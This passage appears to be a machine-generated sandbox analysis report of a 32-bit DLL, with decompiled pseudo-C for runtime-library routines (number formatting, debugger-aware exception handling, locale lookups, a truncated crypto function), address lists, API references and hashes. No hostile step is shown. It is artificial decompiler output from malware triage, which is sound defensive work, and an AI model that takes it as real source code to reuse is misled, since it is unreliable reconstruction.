													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E6DAA1F10();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E6DA94C28(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E6DAA2080(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E6DA8DA42(_t183, _t189, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}






























































              0x6da94907
              0x6da9490d
              0x6da9490f
              0x6da9490f
              0x6da94911
              0x6da94914
              0x6da94917
              0x6da9491c
              0x6da94941
              0x6da94944
              0x6da94949
              0x6da94953
              0x6da94958
              0x6da949b1
              0x6da949b3
              0x6da949c2
              0x6da949c5
              0x6da949c5
              0x6da949c8
              0x6da949ca
              0x6da949d1
              0x6da949e3
              0x6da949e6
              0x6da949eb
              0x6da949ef
              0x6da949f0
              0x6da94a10
              0x6da94a13
              0x6da94a13
              0x6da94a13
              0x6da94a15
              0x6da94a15
              0x6da94a15
              0x6da94a18
              0x6da94a1a
              0x6da94a20
              0x6da94a23
              0x6da94a27
              0x6da94a2b
              0x6da94a30
              0x6da94a33
              0x6da94a33
              0x6da94a39
              0x6da94a39
              0x6da94a43
              0x6da94a1c
              0x6da94a1c
              0x6da94a1c
              0x6da94a45
              0x6da94a4a
              0x6da94a4a
              0x6da94a4f
              0x6da94a52
              0x6da94a5c
              0x6da94a5e
              0x6da94a60
              0x6da94a65
              0x6da94a66
              0x6da94a69
              0x6da94a6c
              0x6da94a6f
              0x6da94a75
              0x6da94a78
              0x6da94a7a
              0x6da94a7d
              0x6da94a80
              0x6da94a82
              0x00000000
              0x00000000
              0x6da94a99
              0x6da94aa0
              0x6da94aa4
              0x6da94aa7
              0x6da94aaa
              0x6da94aac
              0x6da94aac
              0x6da94aac
              0x6da94ab2
              0x6da94ab5
              0x6da94ab9
              0x6da94abb
              0x6da94abf
              0x6da94ac2
              0x6da94ac5
              0x6da94ac6
              0x6da94ac9
              0x6da94acc
              0x6da94acf
              0x6da94ad2
              0x00000000
              0x6da94ad4
              0x00000000
              0x6da94ad4
              0x6da94ad2
              0x6da94ad9
              0x6da94adc
              0x6da94ae4
              0x6da94ae9
              0x6da94aec
              0x6da94aee
              0x00000000
              0x00000000
              0x6da94af0
              0x6da94af5
              0x6da94af6
              0x6da94af9
              0x6da94af9
              0x6da94afb
              0x6da94afe
              0x00000000
              0x00000000
              0x6da94b00
              0x6da94b03
              0x6da94b0a
              0x6da94b0d
              0x6da94b10
              0x6da94b25
              0x6da94b25
              0x6da94b25
              0x6da94b12
              0x6da94b12
              0x6da94b15
              0x6da94b1f
              0x6da94b1f
              0x6da94b17
              0x6da94b1a
              0x6da94b1a
              0x6da94b21
              0x6da94b21
              0x00000000
              0x6da94b10
              0x6da94b05
              0x6da94b05
              0x6da94b07
              0x6da94b07
              0x6da94a54
              0x6da94a54
              0x6da94a56
              0x6da94b28
              0x6da94b28
              0x6da94b2a
              0x6da94b2c
              0x6da94b2f
              0x6da94b30
              0x6da94b31
              0x6da94b32
              0x6da94b3a
              0x6da94b3a
              0x6da94b3a
              0x6da94b3c
              0x6da94b3f
              0x6da94b42
              0x6da94b44
              0x6da94b44
              0x6da94b50
              0x6da94b54
              0x6da94b57
              0x6da94b5c
              0x6da94b68
              0x6da94b6a
              0x6da94b6a
              0x6da94b6d
              0x6da94b6d
              0x6da94b70
              0x6da94b73
              0x6da94b75
              0x6da94b81
              0x6da94b81
              0x6da94b85
              0x6da94b87
              0x6da94b89
              0x00000000
              0x6da94b77
              0x6da94b77
              0x6da94b7d
              0x6da94b8a
              0x6da94b8a
              0x6da94b8d
              0x6da94b91
              0x6da94b92
              0x6da94b94
              0x6da94b96
              0x6da94bf2
              0x6da94bf4
              0x6da94bf5
              0x6da94bf5
              0x6da94bf7
              0x6da94c1a
              0x6da94c1a
              0x6da94c1a
              0x6da94c1c
              0x6da94c1e
              0x6da94c21
              0x6da94c21
              0x6da94c21
              0x6da94c23
              0x00000000
              0x6da94c23
              0x6da94bf9
              0x6da94c00
              0x6da94c00
              0x6da94c01
              0x6da94c02
              0x6da94c04
              0x6da94c05
              0x6da94c06
              0x6da94c0f
              0x6da94c12
              0x6da94c15
              0x6da94c17
              0x6da94c18
              0x6da94c18
              0x00000000
              0x6da94c18
              0x6da94bfb
              0x6da94bfe
              0x00000000
              0x00000000
              0x00000000
              0x6da94bfe
              0x6da94b9d
              0x6da94ba3
              0x6da94ba3
              0x6da94ba4
              0x6da94ba5
              0x6da94ba6
              0x6da94ba7
              0x6da94ba8
              0x6da94bad
              0x6da94bb1
              0x6da94bb6
              0x6da94bb9
              0x6da94bbb
              0x6da94bbe
              0x6da94bc0
              0x6da94bc2
              0x6da94bcf
              0x6da94bcf
              0x6da94bd0
              0x6da94bd1
              0x6da94bd3
              0x6da94bd4
              0x6da94bd5
              0x6da94bda
              0x6da94be0
              0x6da94be3
              0x6da94be5
              0x6da94be8
              0x6da94bea
              0x6da94beb
              0x6da94bee
              0x00000000
              0x00000000
              0x00000000
              0x6da94bf0
              0x6da94bc4
              0x6da94bc4
              0x6da94bc6
              0x00000000
              0x00000000
              0x6da94bc8
              0x00000000
              0x00000000
              0x6da94bca
              0x6da94bcd
              0x00000000
              0x00000000
              0x00000000
              0x6da94bcd
              0x6da94b9f
              0x6da94ba1
              0x00000000
              0x00000000
              0x00000000
              0x6da94ba1
              0x6da94b79
              0x6da94b7b
              0x00000000
              0x00000000
              0x00000000
              0x6da94b7b
              0x6da94b75
              0x00000000
              0x6da94a56
              0x6da94a52
              0x6da949f2
              0x6da949fe
              0x6da949fe
              0x6da94a00
              0x6da94a07
              0x00000000
              0x6da94a07
              0x6da94a02
              0x00000000
              0x6da94a02
              0x6da949b5
              0x6da949bb
              0x6da949bb
              0x6da949be
              0x6da949be
              0x6da949bf
              0x00000000
              0x6da949bf
              0x6da949b7
              0x6da949b9
              0x00000000
              0x00000000
              0x00000000
              0x6da949b9
              0x6da94972
              0x6da9497a
              0x6da9497c
              0x6da94989
              0x6da94990
              0x6da94992
              0x6da949a4
              0x6da949a6
              0x6da949a6
              0x00000000
              0x6da94992
              0x6da9497e
              0x00000000
              0x6da9497e
              0x6da9491e
              0x6da94923
              0x6da9492a
              0x6da9492e
              0x6da94931
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: cee29c366bfd669357f0ef9838885ede6ddc8c41f03f959e052772214be76418
              • Instruction ID: d39dffce3e34d4a19d3b9abf1956c29960384fb4b293a6558bcab18bf42e1368
              • Opcode Fuzzy Hash: cee29c366bfd669357f0ef9838885ede6ddc8c41f03f959e052772214be76418
              • Instruction Fuzzy Hash: 08B1597291C2469FDB058F68C8807FEBBF5EF4D304F198266D924AF241D3B49981C7A8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA89EC6 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 85%
              			E6DA89EC6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6DA89FE1(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6DA8B0A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6DA8B0A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6DA89FE1(_t49);
				}
				return _t49;
			}


































              0x6da89ec6
              0x6da89ec6
              0x6da89ec6
              0x6da89eda
              0x6da89edc
              0x6da89edf
              0x6da89edf
              0x6da89ee3
              0x6da89ee8
              0x6da89f00
              0x6da89f06
              0x6da89f0c
              0x6da89f12
              0x6da89f18
              0x6da89f1e
              0x6da89f24
              0x6da89f2b
              0x6da89f32
              0x6da89f39
              0x6da89f40
              0x6da89f47
              0x6da89f4e
              0x6da89f4f
              0x6da89f58
              0x6da89f5e
              0x6da89f61
              0x6da89f67
              0x6da89f76
              0x6da89f82
              0x6da89f8d
              0x6da89f94
              0x6da89f9b
              0x6da89fa6
              0x6da89fae
              0x6da89fb7
              0x6da89fb9
              0x6da89fbc
              0x6da89fbe
              0x6da89fc8
              0x6da89fd0
              0x6da89fd6
              0x00000000
              0x6da89fdd
              0x6da89fe0

              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6DA89ED2
              • IsDebuggerPresent.KERNEL32 ref: 6DA89F9E
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6DA89FBE
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6DA89FC8
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 28fd3f2f183354f3d8a1ee5c9fd4815f74acfceffaf6c9b9119abd2b40c59a46
              • Instruction ID: 246cfc727d8f300f702cf21e36f679810ff1a125a47099752bf33cc715ceedbc
              • Opcode Fuzzy Hash: 28fd3f2f183354f3d8a1ee5c9fd4815f74acfceffaf6c9b9119abd2b40c59a46
              • Instruction Fuzzy Hash: DF313875D0931D9BDB10DFA4DA89BCCBBB8BF08304F1041AAE50DAB240EB755A85CF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C3C1 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E6DA9C3C1(void* __ecx, signed char __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				intOrPtr _t80;
				void* _t89;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t140;

				_t121 = __edx;
				_t50 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t50 ^ _t127;
				_t125 = _a4;
				_t94 = E6DA92BDC(__ecx, __edx, _a4);
				_t124 =  *(E6DA92BDC(__ecx, __edx, _a4) + 0x34c);
				_t126 = E6DA9C6E9(_t125);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					L38:
					return E6DA89B91(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
							_push(_t124);
							_t94 = 0;
							if(E6DA9C843(_t126, 0) == 0) {
								goto L36;
							}
							 *_t124 =  *_t124 | 0x00000100;
							L34:
							if(_t140 == 0) {
								_t124[1] = _t126;
							}
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						if(E6DA9C843(_t126, 1) == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t140 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E6DA990B4(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
						L12:
						_t121 =  *_t124;
						if((_t121 & 0x00000001) != 0 || E6DA9C81E(_t126) == 0) {
							goto L16;
						} else {
							 *_t124 = _t121;
							goto L15;
						}
					}
					_t92 = E6DAA07D4(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
					_t128 = _t128 + 0xc;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
					} while (_t93 != _v252);
					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}





























              0x6da9c3c1
              0x6da9c3cc
              0x6da9c3d3
              0x6da9c3d8
              0x6da9c3e1
              0x6da9c3e9
              0x6da9c3f8
              0x6da9c404
              0x6da9c415
              0x6da9c41b
              0x6da9c424
              0x6da9c5fe
              0x6da9c600
              0x6da9c602
              0x6da9c603
              0x6da9c611
              0x6da9c611
              0x6da9c43d
              0x6da9c4f8
              0x6da9c503
              0x6da9c5f2
              0x6da9c5f9
              0x00000000
              0x6da9c5f9
              0x6da9c517
              0x6da9c52d
              0x00000000
              0x00000000
              0x6da9c53d
              0x6da9c546
              0x6da9c5b7
              0x6da9c5d3
              0x6da9c5d4
              0x6da9c5e2
              0x00000000
              0x00000000
              0x6da9c5e4
              0x6da9c5ed
              0x6da9c5ed
              0x6da9c5ef
              0x6da9c5ef
              0x6da9c5ed
              0x00000000
              0x6da9c5b7
              0x6da9c54a
              0x6da9c550
              0x6da9c555
              0x6da9c56a
              0x00000000
              0x00000000
              0x6da9c56c
              0x6da9c572
              0x6da9c578
              0x6da9c578
              0x6da9c57b
              0x6da9c57e
              0x6da9c58d
              0x6da9c592
              0x6da9c5ae
              0x00000000
              0x6da9c5ae
              0x6da9c594
              0x6da9c5a2
              0x00000000
              0x00000000
              0x6da9c5a4
              0x6da9c5aa
              0x6da9c55f
              0x6da9c55f
              0x00000000
              0x6da9c55f
              0x6da9c557
              0x6da9c55d
              0x00000000
              0x6da9c55d
              0x6da9c451
              0x6da9c467
              0x00000000
              0x00000000
              0x6da9c477
              0x6da9c47e
              0x6da9c482
              0x6da9c494
              0x00000000
              0x00000000
              0x6da9c49a
              0x6da9c4de
              0x6da9c4de
              0x6da9c4e3
              0x00000000
              0x6da9c4f0
              0x6da9c4f3
              0x00000000
              0x6da9c4f3
              0x6da9c4e3
              0x6da9c4a9
              0x6da9c4ae
              0x6da9c4b3
              0x00000000
              0x00000000
              0x6da9c4b5
              0x6da9c4b8
              0x6da9c4bb
              0x6da9c4be
              0x6da9c4c1
              0x6da9c4c1
              0x6da9c4c4
              0x6da9c4c7
              0x6da9c4d7
              0x6da9c4d9
              0x6da9c4d9
              0x6da9c484
              0x6da9c48a
              0x6da9c48d
              0x6da9c4f5
              0x6da9c4f5
              0x6da9c4f5

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C415
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C45F
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DA9C525
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: InfoLocale$ErrorLast
              • String ID:
              • API String ID: 661929714-0
              • Opcode ID: 40372a693664147d9fa840dca57faadcd0ff4a7f1ac8801d4bc313411c9ea3eb
              • Instruction ID: f19349fe8807f75032a9a1e4ad1ba51d7bd89ab4000a00927aff4bee457fd0c9
              • Opcode Fuzzy Hash: 40372a693664147d9fa840dca57faadcd0ff4a7f1ac8801d4bc313411c9ea3eb
              • Instruction Fuzzy Hash: 4161BF75668A279FEB189E28CD81BBA73F8FF04310F048079E915DA185EB74D9C1CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8D8C3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 78%
              			E6DA8D8C3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6dab3014; // 0x6c4e8ceb
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6DA89FE1(_t41);
					_pop(_t61);
				}
				E6DA8B0A0(_t66,  &_v804, 0, 0x50);
				E6DA8B0A0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E6DA89FE1(_t57);
				}
				return E6DA89B91(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}





































              0x6da8d8c3
              0x6da8d8c3
              0x6da8d8c3
              0x6da8d8ce
              0x6da8d8d3
              0x6da8d8d5
              0x6da8d8dd
              0x6da8d8df
              0x6da8d8e2
              0x6da8d8e7
              0x6da8d8e7
              0x6da8d8f3
              0x6da8d906
              0x6da8d914
              0x6da8d91a
              0x6da8d920
              0x6da8d926
              0x6da8d92c
              0x6da8d932
              0x6da8d938
              0x6da8d93e
              0x6da8d944
              0x6da8d94a
              0x6da8d951
              0x6da8d958
              0x6da8d95f
              0x6da8d966
              0x6da8d96d
              0x6da8d974
              0x6da8d975
              0x6da8d97e
              0x6da8d984
              0x6da8d987
              0x6da8d98d
              0x6da8d99a
              0x6da8d9a3
              0x6da8d9ac
              0x6da8d9b5
              0x6da8d9c3
              0x6da8d9c5
              0x6da8d9da
              0x6da8d9e6
              0x6da8d9e9
              0x6da8d9ee
              0x6da8d9fb

              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6DA8D9BB
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6DA8D9C5
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6DA8D9D2
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 81b866c4252fe133986b118eb72ea4acf85d8e6bd9e2d1cfcfbee8024d7d0eeb
              • Instruction ID: b6fb15600e5affc150ebbb5bea3fbe8344498087a134a75e94681cb1e01d82eb
              • Opcode Fuzzy Hash: 81b866c4252fe133986b118eb72ea4acf85d8e6bd9e2d1cfcfbee8024d7d0eeb
              • Instruction Fuzzy Hash: 7D31E57490522D9BCF21DF28D98878CBBB8BF08310F5042EAE91CA7251EB709BC18F45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA904A0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 94%
              			E6DA904A0(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v540;
				signed int _v544;
				signed int* _t179;
				signed int _t181;
				intOrPtr _t182;
				signed int _t185;
				signed int* _t187;
				signed int _t189;
				unsigned int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t201;
				intOrPtr _t207;
				void* _t210;
				signed int _t212;
				signed int _t223;
				void* _t227;
				signed int _t230;
				intOrPtr* _t237;
				signed int _t238;
				signed int* _t239;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				void* _t245;
				intOrPtr* _t246;
				signed int _t247;
				signed int _t252;
				unsigned int _t253;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t260;
				void* _t264;
				signed char _t270;
				intOrPtr* _t272;
				signed int _t276;
				signed int* _t277;
				signed int _t284;
				signed int _t285;
				signed int* _t288;
				signed int _t291;
				signed int _t293;
				intOrPtr* _t294;
